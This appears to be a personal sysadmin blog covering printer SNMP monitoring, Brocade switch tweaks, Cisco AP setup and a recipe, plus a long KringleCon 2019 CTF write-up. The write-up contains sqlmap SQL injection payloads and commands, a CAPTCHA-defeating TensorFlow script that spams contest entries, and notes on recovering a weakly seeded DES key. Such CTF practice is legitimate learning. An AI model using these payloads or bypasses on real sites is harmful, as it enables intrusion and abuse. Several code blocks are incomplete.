Prometheus and SNMP from a printer

The other week I finally for this thing working I’ve been trying weakly to do every now and then when I had a few minutes free: send an alert before a toner runs out in a printer!

Way back I set up SNMP_exporter to fetch metrics from switches. This worked very nicely. ( In retrospect this works nicely because it’s the default type of device )

But for printers we didn’t get much useful data out. Even though we use the vanilla upstream snmp.yml which has printer stuff in it. And when I did an snmpwalk I did manage with some research to find the correct OIDs to query to get the level of ink in the toners. So I knew the printer did publish the information I was looking for.

The answer? Select a module when sending the request to the exporter! I didn’t select printer_mib so it used if_mib that only has interface statistics.

What would have helped? Not suing the vanilla (large) snmp.yml and only use a custom one that has the data we wanted..

Printers are no fun :/

Prometheus is!

Convert a string to integer in Kibana with painless

if (doc['bytes.keyword'].size()!=0) {
    return Integer.parseInt(doc['bytes.keyword'].value)

This took me a while to figure out!

The above only works for Integer (so no 1.1 or 2.22).

It works on ELK 7.10

I needed it because I’m using %{COMBINEDAPACHELOG} GROK pattern.

That GROK pattern is built-in with logstash and just says NUMBER:bytes and number is (?:%{BASE10NUM})

There’s actually a way to specify in the grok pattern that it’s an integer:

%{NUMBER:field:integer} is an open issue from 2016 about this issue.

I guess what I should do is just make my own pattern with this fixed where I want it… I would really like to not fiddle with templates or add logstash mutate rules..

Non Brocade Branded USB stick activation

Another submission courtesy of Eberhard.

Run anything here at your own risk. From what I can tell they should be fairly safe. Do make sure you run them on the switch itself. Pretty nice in case you don’t want to shell out for a Brocade branded USB stick to transfer firmwares!


I found a description how to format a USB-Stick that could be accessed
by the brocade OS.

In fact after some investigation I noticed an error of this description
that prevents to
access this special configured stick.

To make life easier I modified the /sbin/hotplug script by adding one line.
Now any USB-Stick may be used for installation or backup purposes.

The modified hotplug script adds the VENDOR string to
/etc/fabos/usbstorage.conf if the vendor is unknown.
If you redo the “usbstorage -e” command the previously unknown Vendor
stick is been recognized by hotplug
and the activation of the access succeeds!

It might be annoying to do the activation of a stick twice but this has
to be done only if the vendor of the
usb-stick is new for your brocade switch.

Fabos is capable to handle VFAT32-formatted sticks.

The stick needs 5 directories (1 and 4 children):

Here is the diff

# diff hotplug.orig hotplug

 >     echo “VENDOR $vendor” >> $USBCONFIG

The above output means – “Add the ‘echo … ‘ bit on line 62”

All stuff is been tested with FOS v7.4.2f.

Insert stick in a switch and run this script as root:

#!/bin/bash -x
insmod /lib/modules/default/kernel/drivers/usb/core/usbcore.ko
insmod /lib/modules/default/kernel/drivers/usb/host/hcd-driver.ko
insmod /lib/modules/default/kernel/drivers/usb/storage/usb-storage.ko
sleep 10
lsmod | grep usb
/bin/mknod -m 660 /dev/sda b 8 0
/bin/mknod -m 660 /dev/sda1 b 8 1
/bin/mknod -m 660 /dev/sda2 b 8 2

Sometimes the above script fails and you need to run it until it has usb_storage and usbcore modules listed as loaded kernel modules.

Now I can mount an ext3 formatted USB-stick:

# mkdir /usb_ext3

# mount -t ext3 /dev/sda1 /usb_ext3

# ls /usb_ext3/

bin/         dev/     fabos/   libexec@  sbin/           tftpboot/ var/
boot/        diag@    import/  mnt/      share@          tmp/
config/      etc/     initrd/  proc/     standby_sbin/   users/
core_files/  export/  lib/     root/     support_files/  usr/

# mkdir /usb_vfat

# mount -t vfat /dev/sda1 /usb_vfat

# ls /usb_vfat/
.Trash-1000/  brocade/  config/  firmware/  firmwarekey/  hda1.dmp* support/

I’ll stop here at the moment because now I need to know how u-boot
starts an OS from an USB-stick…

Brocade CF Replacement Hints

This post is based on a submission from a reader of this blog Eberhard, maybe primarily of the popular Brocade SAN upgrades post. Many thanks for this, hoping it will help someone out there!

The topic here is how to replace the embedded Compact Flash card if that breaks.

You can read about how to do that in the PDF below:

If your CF drives are exactly the same size (not in GB, in blocks) as the one in Brocade then you could get away with dding the whole /dev/sda – which would simplify the process a little.

Again, many thanks for the contribution!

New Home Network Plan!

Changing apartment again so a pretty decent time to change the network at home.

Doing it a bit on the cheap this time around.

We’ll get a docsis cable connection. Fortunately I have a modem used to connect to the same ISP from a previous apartment. Unfortunately the modem was a bit shit. Or it used to reboot or need a reboot every now and then.

The plan is now to put the modem into bridge mode and move the brains into two other devices.

First device: A Raspberry Pi 3B with openwrt installed. It’ll have an extra Realtek 8153 1Gbps USB port.

Internal NIC 100Mbps goes to LAN and will have DHCP Server. The external will have the WAN connection. The RPI 3b also has a WiFi, but it’s only 2.4GHz so we’ll only use that for local admin access.

Second device is a Cisco AP that I blogged about not too long ago. That can do 5GHz :) This hasn’t been used but I set it up so I can just plug it into an L2 with a DHCP and it should just work.

Will also use an unmanaged switch to connect stuff on the LAN.

One nice thing with the current apartment is the Ethernet in all rooms. New one might only have one cable TV/antenna port. Hoping for more. I’d rather not have to use some Ethernet over Power as there’s also a media server to connect onto the LAN or wifi near the Chromecast.. sometimes it’s nice to not throw everything away. Thought I had thrown away the cable modem too, but turns out I hadn’t. New one is 180€ and used ones seems to go quite quickly on second hand marketplaces.

3 months at IQM today!

And I’m on holiday :)

Wasn’t really expecting to be able to go on holiday working for a startup, but there’s some coverage and the old IT Admin is still there so very nice to be able to take time off and not have to worry. Even get some more later in the summer. All those extra hours I managed to squeeze in by not commuting to work got me a few extra weeks of holiday :)

Got lots of things in the pipeline to think about though, without going into much details they are important but quite some distance from what I’ve worked with so far – basically a whole ecosystem to get familiar with. Soon I’ll have to decide if I want to do it hacky way, learning what the proper way or try to outsource it. But what I want shouldn’t come first, what makes business sense should.

So far have enjoyed getting reacquainted with the ELK stack and getting acquainted with Prometheus for monitoring. No fancy queries yet, but so far looking quite OK.

Unsurprisingly I’ve also enjoyed doing some documentation work and keeping things patched :)

One month at IQM today!

Was reminded that today was exactly one calendar month since I joined IQM Finland

It’s been a very hectic month and it’s been mostly remote because of the pandemic. Have met a few people, video chatted with a few. We have these weekly lunch meetings that is a good way to see and hear people . I try to bring up a little bit social non work things in the video meetings just to get to know people a little bit.

I’m really enjoying it and it’s been interesting to see how the company mindset makes such a difference to my work as a sysadmin/it specialist.

Resepti: Risotto


  • 2 katilaa
  • 1 pannu
  • Voi
  • Sipuli
  • Risotto riisi
  • Vesi
  • Liemikuutio
  • Kuiva Omena Siideri
  • Parmeggiano
  • Raakaa makkaraa

Käyttöohjeet :

Vesi ja liemikuutio yhteen kattilalle.

Makkarat panulle, ehkä 4/10 lämpö. Käytää kansi ja vaihta makkarat usein. Käytää haarukkaa ja tee muutama reikää makkaraan kun se on melkein valmis. 20 min? 30min ja liian aikaisin reikää makkaraa tulivat vähän kuiva mutta vielä hyviä

Voi toiseen kattilalle, sipuli ja riisi. 4 min.

Sitten laitta vettä risottokattilaan kun se on loppu. Riiisi on valmis kun se on pehmeä.

Viimeistä laitta makkarat ja parmeggiano


Yesterday was my last day at CSCfi

9 years were significant and meaningful to me.

We did a lot of cool things that as a very nice side benefit helped research, both in Finland and in other places!

I’ve been involved in some core projects, both for internal users and external ones. I was free to release code as open source. I have solved hard problems, gotten rid of manual work with automation and helped people grow.

I’m happy to have met great friends and colleagues at CSCfi. I’ve learned so much and many thanks for showing how to work right and that it’s not all about 9-5 work.

It has been a rewarding experience. I like to think I’ve come quite some way from where I started. So long, @CSCfi, and thanks for (all the fish) lasting memories!

AIR-LAP1142N-E-K9 to autonomous Mode Adventure

Wifi and PoE injector


Some initial needful information

  • Reset is done by holding MODE and then powering off and on the device
  • Default enable password is Cisco
  • Serial ttyUSB0 worked with one usb to rs232 and then a serial to RJ45 adapter, my cheapo ebay USB to rj45 did not work. The colors of the wires are different..
    • working: LL977744 CSA AWM and a “pl2303 converter” Prolific Technology Inc on ttyUSB0
  • Firmware c1140-k9w7-tar.153-3.JD17.tar found on twitter with checksum d96702caf75442f01359aa9a6cb70d19

While the AP is in non autonomous mode you need to run a debug command to get the conf t: debug capwap console cli

To change it from using a controller to autonomous mode you need to load a firmware that is like that. The one I got had a firmware loaded that wanted to talk to a controller.

  • While looking in serial log indeed the firmware on the AP was “w8” at the end == needs a WLC
  • tried to first setup a TFTP server and open firewalls and reboot the access point while holding the mode button (you need to hold it for a long time, like 27s) – it tried to fetch the image from tftp:// but didn’t work / timed out..

Hunt goes on:

These release notes got me a bit worried:

Conversions from an 8.0 Wireless LAN Controller unified release AP image to autonomous 15.3(3) k9w7 image will get aborted with a message “AP image integrity check failed.” To overcome this, load any previous autonomous k9w7 image and then upgrade to the 15.3(3) JAB k9w7 images. If this is the same as LWAPP version I had was 7.3.x so the above did not apply. is talking about changing listening address to instead of ..

secret sauze

  • setup static IP on your linux computer, make sure to not just “ip addr add ip/24 dev eth0” because you might still have NetworkManager with DHCP that might revert those changes
  • setup a dhcpd that has range or some such
  • setup a linux tftp.service – if you want “–verbose –address” to the tftp.service CentOS7 edit that file in systemctl cat tftp
    • Not sure if needed but maybe it was useful
  • systemctl start tftp dhcpd
  • sysetmctl disable dhcpd tftp
  • make sure to let UDP(& TCP?) 69 through the firewall
  • next is to connect the console and login to the AP and run some commands:
$ ena
# conf t
# debug capwap console cli
# archive download-sw /force-reload /overwrite tftp://
  • Before you disconnect the ethernet cable to the AP, do stop and disable dhcpd and tftp to prevent running some extra dhcp server in some office network.

Configuring it

Easiest is probably to use the http on http://IP:80 to configure it

Username/Password: Cisco/Cisco d/guide/ap1140aut_getstart.html

There’s the express setup and I used these settings:

  • Only configured the 5GHz
  • Set a short SSID and enabled broadcast beacon
  • WPA2-PSK key
  • Disabled universal admin
  • Set VLAN 5 and native VLAN

Other changes:

  • Enable the radio (no shutdown on the interface or in the web ui)
  • Create a new user/change default passwords of Cisco user to make it a little bit harder for things to pwn it
  • Set clock
  • Change hostname and set a banner login banner
  • copy run start

One could enable https, but that used a too weak key by default so I just left it at http. In any case make sure to set the clock before enabling https.

Some extremely useful links

Previous post in this blog about my home network:

Quadra – Did You Play It?

In my youth I enjoyed the LANs. One fun game we played was Quadra – which is a multiplayer tetris where by playing the game you send more blocks to your opponents making it very stressful :D turns out it is open source and it’s out there!

Does it still build?

CentOS 7.7:

$ sudo yum install git
$ git clone
$ sudo yum groupinstall "Development Tools" 
$ sudo yum install SDL2-devel boost-devel libpng-devel
$ cd quadra
$ autoreconf -i
$ ./configure
$ make


Does it run!?

$ QUADRADIR=. ./quadra

And I get a very nice window :)

Quadra in 2020! (do note that it tries to talk to google and sourceforge for updates and so on, try the ./configure –disable-version-check)

I could even launch one process to run a server and then another server and connect to localhost :) So multiplayer must sureley durely work!

It’s a big laggy – I recall it being very snappy because I was da bomb at this game :)

I blame this on that I might have missed some dependency and it now fell back into some easier something and or maybe the graphics card in this laptop is not good (maybe it’s too new? It’s a Skylake GT2 HD G 520).

Kringlecon 2019 Write-Up

The challenges!

Hoe the season to be jolly! Been giving a few CTFs  lately. It started with the disobey 2020 puzzle to get the hacker ticket. Then there was the OverTheWire‘s 2019 advent CTF. And finally this one, the SANS holiday hackmechallenge – KringleCon 2019. As of writing I got what felt like quite far in the disobey but got real nice stuck in the second keyhole. For OTF I found a similar but slightly easier challenge on the 6th day December, but did not manage to get the key. Most others except the first and challenge-zero I didn’t really have time for. So with not so much progress it was very nice to take a step back and try out KringleCon where I managed to get a bit further!

Short tldr of methods to answers to the objectives
  1. talkt to santa: go upupuppu and click click click :)
  2. find turtle doves: mm they were in the union
  3. unredact: at the time I was on ski holiday so used termux on my phone and installed pdf2txt there to unredact it :) Fun to use the phone :)
  4. windows event log outcome: clicked around until I found something that looked suspicious. I think it was a filename that looked sensitive.
  5. windows event log technique: parsed these with python to print command_line and procerss_name the cat
  6. network log – compromised system: got it to print IPs with python
  7. splunk: followed the chat, was quite a nice way to learn the tool. Finding the correct file in the archive was a bit tricky, had to read through the chats carefully several times :)
  8. steam tunnels: the physical key! Spent quite some time wandering around trying to find the key. Eventually gave up. Then tried again after making it into the sleigh shop and hey there it was :) Couldn’t really get the decoder to line up so used pixels mostly, took 5 times or so :)
  9. captcha: super fun, most fun. Hadn’t tensorflowed before. Followed the youtube and github repo basically. Used an 80core 365GB cloud instance from $dayjob for a short while as the 2core 2GB RAM instance I used was too small ;)
  10. scraps: hadn’t used sqlmap before either. First mapped out the page manually to find the forms. Then learnt about sqlmap –crawl :) Money shot for me was –eval=”import requests;token=requests.get(‘’).text”
  11. elfscrow: So. Hard. Learnt a bit more assembly reading. Used IDA this time instead of my previous attempts with radare2. Wonder when I’ll get better at these :)
  12. sleigh shop door. also very fun to unlock those locks! Did not solve it under 5s but the one slower than that.
  13. filter out poisoned: ugh this one was tedious. Actually this and previous I did spend some time trying to learn them, but in the end found a write-up that was published too early (and later removed but still in google cache..)

Getting on with it!

  • The pdf deobfuscate I could do on my phone in termux just a pkg install pdftotext :)
  • The nyancat took a bit of more time than I should admit, but primarily I forgot how sudo works and what sudo -u does..
  • The frosty keypad I got to write a small python script: (also on a wall somewhere :)
import random

#numbers = [ 1, 3, 7 ]

results = []

length = 4
digits = 1337

# from
def is_prime_number(x):
  if x >= 2:
    for y in range(2,x):
      if not ( x % y ):

# from
while len(results) < 1000:
     for digit in range(1):
       digits =''.join(str(random.randint(0, 9)) for i in range(length))
       if "3" in digits and "1" in digits and "7" in digits and not "0" in digits and not "2" in digits and not "4" in digits and not "5" in digits and not "6" in digits and not "8" in digits and not "9" in digits:
         if digits not in results:
           if is_prime_number(int(digits)):

You’ll need to hit CTRL+C when it doesn’t find any more solutions. It’s not the fastest, has unused bits and I don’t know why it has the for digit in range(1) bit.

On to the next challenge!:

  • The windows events log file I just opened the file on a Windows machine and looked around
  • The sysmon file I printed some interesting keys in the json strings with a tiny python script
import json

with open('sysmon-data.json') as json_file:
    data = json.load(json_file)
    for p in data:
  • For the splunk basically just followed the chats. A bit tricky to be fair! By luck I had managed to already download the correct file from the Archive but did not look at it deep enough..
  • For the greylog just clicked around. I liked the “quick table” feature and that got me some of the questions fairly quickly without having to write more narrow searches. Quite a few steps needed for this so took some time. It was nice to get to compare greylog and splunk, I’ve only used a vanilla ELK stack before and last version 5. With that in mind the discover data was for me a bit easier on greylog.
  • Trail of tears I just beat the game on easy :) (/edit turns one can solve this on hard

Next one was a powershell one! The laser adjuster :P

Finally got to get a bit familiar with powershell. I’m a lurker on r/sysadmin and very often there are powershell oneliners on display there. This was quite a fun one to be honest :) Kind of like using python directly in the shell.

Some things I learnt were:

  • Get-History shows stuff! But no .bash_history so I actually wonder where this history is from? It’s not in .local/powershell…
  • Trying to bruteforce this one manually was very slow so I gave that up fairly quickly.
  • I tried to find a way into reading the python code that powered the website. Only found the process id but no open files visible. Would need to get root for that I suppose..
  • figured out how to -X POST a body for the gases!
  • hints in chat suggested powering off and on
  • $env has things!
  • Format-Hex -Path ./archive | Select-Object -First 1
    • magic number 50 4B 03 == zip
    • expand-archive
    • chmod +x
    • get-content riddle # Gives an md5sum
  • md5sum hunter
$files = Get-childitem -Path /home/elf/depths -recurse -File
Foreach ($file in $files)
     if((Get-FileHash -Path $file.fullname -Algorithm MD5).hash | Select-String 25520151A320B5B0D21561F92C8F6224){

Could have found this with a recurse grep for temperature -e angle -e param..

The solution:

(Invoke-WebRequest -Uri http://localhost:1225/api/off).RawContent                                       $correct_gases_postbody = @{O='6';H='7';He='3';N='4';Ne='22';Ar='11';Xe='10';F='20';Kr='8';Rn='9'}      (Invoke-WebRequest -Uri http://localhost:1225/api/gas -Method POST -Body $correct_gases_postbody).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/on).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/output).RawContent


  • Iptables/ smart bracelet one: think I was close or did complete this but Kent did not agree? Went back and tried this again slowly by first writing the commands in a text file
sudo iptables -P FORWARD DROP

sudo iptables -P INPUT DROP

sudo iptables -P OUTPUT DROP

# shouldbe in two lines? as the iptables output orders them related,established..
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 22 -s -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 21 -s -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -s -j ACCEPT

sudo iptables -A OUTPUT -p tcp --dport 80 -d -j ACCEPT

sudo iptables -A INPUT -i lo -j ACCEPT

Kent TinselTooth: Great, you hardened my IOT Smart Braces firewall!
  • Sled Route API : Got the login. Next to figure out which requests were bad and how to fill in 100 on the web page… Maybe one can figure out the firewall API? Hmm played a bit with elasticsearch.. then gave up.. in the meantime went ahead to:

Sleigh Shop Door

  • Ah this isfun! While poking through the web source after fixing the smartbracelet found the URL to the sleigh shop in teh source. It had a bunch of locks.
haha! if you reload the page the codes needed are different!

1. B46DU583 - top of the console
2. XNUBLBKW - see it by lookingin ctrl p
3. unknown, fetched but never shown..

ha this was funneh, so clicking around the tabs found a javascript that needed some deobfuscate/ and it found var _0x1e21

so I ran that in the console with the values found in if statements and eventually:


 and it printed a bunch of things, and element 34 had an image:

VM3008:1 images/73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12.png

which was image with combination to the 3rd lock

4. ILMJRNTP found in local storage
5 CJ4WCMG4 - <title></title>

6. from the card.. Y3WJVE01 sticker - but if one removes the hologram CSS the letters are in a different order JYV0EW13. 
7. G7LDS1LS - font family

8 VERONICA In the event that the .eggs go bad, you must figure out who will be sad.
From client.js and then deobfuscated to make it a bit readable and just read through

chakra in css file
10. compopnent.swab, bunch of things around lock c10

finding .locks > li > .lock.c10 .cover

one can remove the cover

on the board there's a code: KD29XJ37

but all the other codes have been per session..

console.log says "Missing macaroni"

In the code there's:

 console["log"]("Well done! Here's the password:");
 console[_0x1e21("0x45")]("%c" + args["reward"], _0x1e21("0x46"));

In the console there's this whenever one presses the unlock:

73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Error: Missing macaroni!
    at HTMLButtonElement.<anonymous> (73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1)
(anonymous) @ 73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1

there's a bunch of "<div class="component gnome, mac, swab" with data-codes: XJ0 A33 J39

Dragging the components further down changed the error and printed this in the console:

Well done! Here's the password:
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 The Tooth Fairy
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 You opened the chest in 6291.088 seconds
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Well done! Do you have what it takes to Crack the Crate in under three minutes?
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Feel free to use this handy image to share your score!
  • Doing the combination locks in under 3 minutes I think can be done manually.
    • But nice thing to do would be to enter a bunch of commands into the browser console to help with some programmatically. Maybe one can enter javascript to also enter the numbers into the locks??
some are maybe fixed??:

However, after doing that as fast as I could manually:

You opened the chest in 150.151 seconds
621c8819-1d6a-4d77-bd41-5214a6beccf5:1 Very impressive!! But can you Crack the Crate in less than five seconds?
621c8819-1d6a-4d77-bd41-5214a6beccf5:1 Feel free to use this handy image to share your score!
  • For that I’m thinking burp suite to automate the browser is needed?
  • When inside the Sled Shop there was a request to get the IP for the connection with longest duration:
head conn.log|jq '.["id.orig_h"],.duration' -c 'sort_by(.duration)'
cat conn.log|jq -s -c 'sort_by(.duration)' > /tmp/sorted
cat /tmp/sorted#... took forever, then just looked at the bottom:
4-18T21:27:45.402479Z","uid":"CmYAZn10sInxVD5WWd","id.orig_h":"","id.orig_p":8,"id.r                     esp_h":"","id.resp_p":0,"proto":"icmp","duration":1019365.337758,"orig_bytes":3078192                     0,"resp_bytes":30382240,"conn_state":"OTH","missed_bytes":0,"orig_pkts":961935,"orig_ip_bytes":577                     16100,"resp_pkts":949445,"resp_ip_bytes":56966700}]   

Finishing each challenge gives some tips to some other challenges. There was a hint to the Sled Route API suggesting to use jq. And there was another that if you beat the Trail Game on Hard there’s more hints? Also beating the lock game in under 3 minutes is another hint I think..

  • Next one I managed was the key bitting one to get into the Steam Tunnels! There was a good talk on this topic with a link to and then just used that and tried maybe 5 keys before finding the right now. GIMP is not my specialty but the decoders helped a bit. The image of the key was not discoverable until one got into the Sleigh Shop.

Image AI

And then we get to the CAPTCHA + tensorflow madness! This was real fun, haven’t had to do much with tensorflow before. Did not have to read much at all about tensorflow to get this going, could basically just glue together the provided python scripts.

Another very good kringlecon talk on this topic: led to a github repo. Some other code and training images were found as soon as one got far enough into the Steam Tunnels. I managed to after not too much googling get the python script to store the images in teh CAPTEHA in a directory and then run the predict tensorflow python script on the github repo against it. It was however too slow. Fortunately I had access to a machine with lots of cores so moving all the data there and re-running the python got it working for me. 2 oversubscribed cores and 2GB RAM was too little. 80 dedicated single server skylake cores and 356GB RAM completed it much faster. There were messages about tensorflow from pip not having been compiled with all the things enabled. I could I suppose also have tried this with a GPU :) And the PYTHON:

#!/usr/bin/env python3
# CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys
import os
import shutil
import base64

os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
import numpy as np
import threading
import queue
import time

def load_labels(label_file):
    label = []
    proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
    for l in proto_as_ascii_lines:
    return label

def predict_image(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation):
    image = read_tensor_from_image_bytes(image_bytes)
    results =[0], {
        input_operation.outputs[0]: image
    results = np.squeeze(results)
    prediction = results.argsort()[-5:][::-1][0]
    q.put( {'img_full_path':img_full_path, 'prediction':labels[prediction].title(), 'percent':results[prediction]} )

def load_graph(model_file):
    graph = tf.Graph()
    graph_def = tf.GraphDef()
    with open(model_file, "rb") as f:
    with graph.as_default():
    return graph

def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
    image_reader = tf.image.decode_png( imagebytes, channels=3, name="png_reader")
    float_caster = tf.cast(image_reader, tf.float32)
    dims_expander = tf.expand_dims(float_caster, 0)
    resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
    normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
    sess = tf.compat.v1.Session()
    result =
    return result

# above is from because python and import meh


def main():
    yourREALemailAddress = ""

    # Creating a session to handle cookies
    s = requests.Session()
    url = ""

    json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
    b64_images = json_resp['images']                    # A list of dictionaries eaching containing the keys 'base64' and 'uuid'
    challenge_image_type = json_resp['select_type'].split(',')     # The Image types the CAPTEHA Challenge is looking for.
    challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting

    # 0 wipe unknown_images dir
    # why wipe it tho?
    # 1 write b64 to unknown_images dir

    imgcnt = 0
    for image in b64_images:
        imgcnt = imgcnt + 1
        content = image['base64']
        uuid = image['uuid']

           filename = "unknown_images/%s" % uuid
           with open(filename,"wb") as f:
        except Exception as e:
    #    if imgcnt > 10:
     #       break
    # 2 run the predict against it
    #  python3 would have been fun instead we copy pasta
    # talks about mobilenet and speed optimizations..

    # Loading the Trained Machine Learning Model created from running on the training_images directory
    graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
    labels = load_labels("/tmp/retrain_tmp/output_labels.txt")

    # Load up our session
    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)

    # Can use queues and threading to spead up the processing
    q = queue.Queue()
    unknown_images_dir = 'unknown_images'
    unknown_images = os.listdir(unknown_images_dir)

    #Going to interate over each of our images.
    for image in unknown_images:
        img_full_path = '{}/{}'.format(unknown_images_dir, image)

        print('Processing Image {}'.format(img_full_path))
        # We don't want to process too many images at once. 10 threads max
        while len(threading.enumerate()) > 10:

        #predict_image function is expecting png image bytes so we read image as 'rb' to get a bytes object
        image_bytes = open(img_full_path,'rb').read()
        threading.Thread(target=predict_image, args=(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation)).start()

    print('Waiting For Threads to Finish...')
    while q.qsize() < len(unknown_images):

    #getting a list of all threads returned results
    prediction_results = [q.get() for x in range(q.qsize())]

    #do something with our results... Like print them to the screen.

    # 3 get a list of the uuids for each type
    good_images = []
    for prediction in prediction_results:
        print('TensorFlow Predicted {img_full_path} is a {prediction} with {percent:.2%} Accuracy'.format(**prediction))        if prediction['prediction'] in challenge_image_types:
    # TensorFlow Predicted unknown_images/dc646068-e584-11e9-97c1-309c23aaf0ac is a Santa Hats with 99.86% Accuracy

    # 4 make a new b64_images csv list with the uuids
    good_images_csv = ','.join(good_images)


    # This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
    #final_answer = ','.join( [ img['uuid'] for img in b64_images ] )
    final_answer = good_images_csv

    json_resp = json.loads("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
    if not json_resp['request']:
        # If it fails just run again. ML might get one wrong occasionally
        print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
        print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))

    print('CAPTEHA Solved!')
    # If we get to here, we are successful and can submit a bunch of entries till we win
    userinfo = {
        'name':'Krampus Hollyfeld',
        'about':"Cause they're so flippin yummy!",
    # If we win the once-per minute drawing, it will tell us we were emailed.
    # Should be no more than 200 times before we win. If more, somethings wrong.
    entry_response = ''
    entry_count = 1
    while yourREALemailAddress not in entry_response and entry_count < 200:
        print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
        entry_response ="{}api/entry".format(url), data=userinfo).text
        entry_count += 1

if __name__ == "__main__":

NEEEXT! Student Body finding some scrap papers objective 9

  • Got some hints in the game talking about sqlmap. Let’s play with that and learn about SQL injections :)
    • Started by looking at the page and reading the source code. Identified two forms on two pages that looked interesting.
    • First went down a rabbit hole of the sqlmap tamper scripts.
    • Just doing this:
token=$(curl validation)
sqlmap --url="https://url?token=$token" -p variable
  • Got sqlmap to find that elfmail in the check.php was vulnerable.
  • a curl “https://url?’token=$token”
    • got a noice SQL error!
  • tamper investigation was not wasted because
token=$(curl validation)
sqlmap --url="$token" -p elfmail --eval="import requests;token=requests.get('').text"
  • was needed to get sqlmap to find some techniques. Presumably the token only worked for the first tests.
Parameter: elfmail (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload:' AND 2977=2977 AND 'tYvj'='tYvj&token=MTAwOTU4MTk3Njk2MTU3NzQ3MTgzOTEwMDk1ODE5Ny42OTY=_MTI5MjI2NDkzMDUwODgzMjMwNjYyMzI2LjI3Mg==

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload:' AND (SELECT 4602 FROM(SELECT COUNT(*),CONCAT(0x7176786a71,(SELECT (ELT(4602=4602,1))),0x7162626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XazW'='XazW&token=MTAwOTU4MTk3Njk2MTU3NzQ3MTgzOTEwMDk1ODE5Ny42OTY=_MTI5MjI2NDkzMDUwODgzMjMwNjYyMzI2LjI3Mg==

Could not get the above queries to work in a curl.. maybe some escape messup. But sqlmap –users find stuff.

[18:51:19] [INFO] retrieved: 'elfu'
[18:51:20] [INFO] retrieved: 'applications'
[18:51:21] [INFO] retrieved: 'elfu'
[18:51:22] [INFO] retrieved: 'krampus'
[18:51:23] [INFO] retrieved: 'elfu'

sqlmap had a nice –sql-shell and with that one could “select * from elfu.krampus” which got us some paths:

select * from elfu.krampus [6]:
[*] /krampus/0f5f510e.png, 1
[*] /krampus/1cc7e121.png, 2
[*] /krampus/439f15e6.png, 3
[*] /krampus/667d6896.png, 4
[*] /krampus/adb798ca.png, 5
[*] /krampus/ba417715.png, 6

Now then that looks like an OS path, need to run a shell command.. but on a whim tried and yay found them there. Fired up good old GIMP and learnt about the rotate tool :P Yay, one more objective!

Remaining are reversing some crypto windows executable and the ban the IPs in the firewall for the route API

Crypto then. Hint is >

Running an encryption tells us it uses unix epoch as a seed and a hint to the challenge was ” We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC. ” This is from 1575658800 to 1575666000 . There are some super_secure_random and super_secure_srand functions found with IDA freeware. Probably they are not super. for example is one in use. I wonder what the difference with –insecure is? One error talks about DES-CBC which internet says is insecure. It uses 56-bits and 8bytes. Stack of do_encrypt also says “dd 8” so yay?


Which is used in security_init_cookie And imp__QueryPerformanceCounter. Way more than 8 bytes though.

While looking at these listened to the youtube talk and it said “running it at the same time generates the same key” – tried that with two identical files and it generated the same key. What about with two files without same checksum? Yep. Same. Encryption key. So next step would be to try to encrypt something for every second between 1575658800 to 1575666000 ? That’s 7200. Which would give us 7200 keys we could try to use to decrypt the file. Is it too much? Right now I’m thinking the –insecure might help if one use the Burp suite to intercept the packages to the elfscrow api server? The time bit in the code uses time64

call time into eax
then eax as a parameter into:
call super_secure_srand
there is a loop (8) and inside that it calls super_secure_random which looks complicated but by googling the numbers in decimal we find:

which has

rseed * 214013 + 2531011
# the disasembled then does:
sar     eax, 10h
and     eax, 7FFFh

Which is also here:
And here I learnt that >> in python is the sar.

After goin walking thought a bit about what is the end goal here. And it is not the key, but it could be. Right now plan is to generate the secret-id, because the secret-id is what is used to decrypt with the tool, not the key. But maybe the uuid is something you only get from the escrow API server.

$ curl -XPOST -d 1234567890abcdef
$ curl -XPOST -d 0e5b05dd-e132-42aa-b699-1829d3e23e2f

Seems it is. And the hex needs to be in lower letters. ABCDEF did not fly. UUID must be in this format: 00000000-0000-0000-0000-000000000000 it seems. Not sure about sqlmap use here. . SSH and web server is running. But SSH has been open on several previous addresses in this CTF too..

 WEBrick/1.4.2 (Ruby/2.6.3/2019-04-16) at

Actually what might be doable with just the key is to: setup my own API server that just returns the key.. Change the address in the binary or finally use BURP or local DNS override? Still need to figure out the key :))

Let’s try to read the do_encrypt again

  1. call read_file
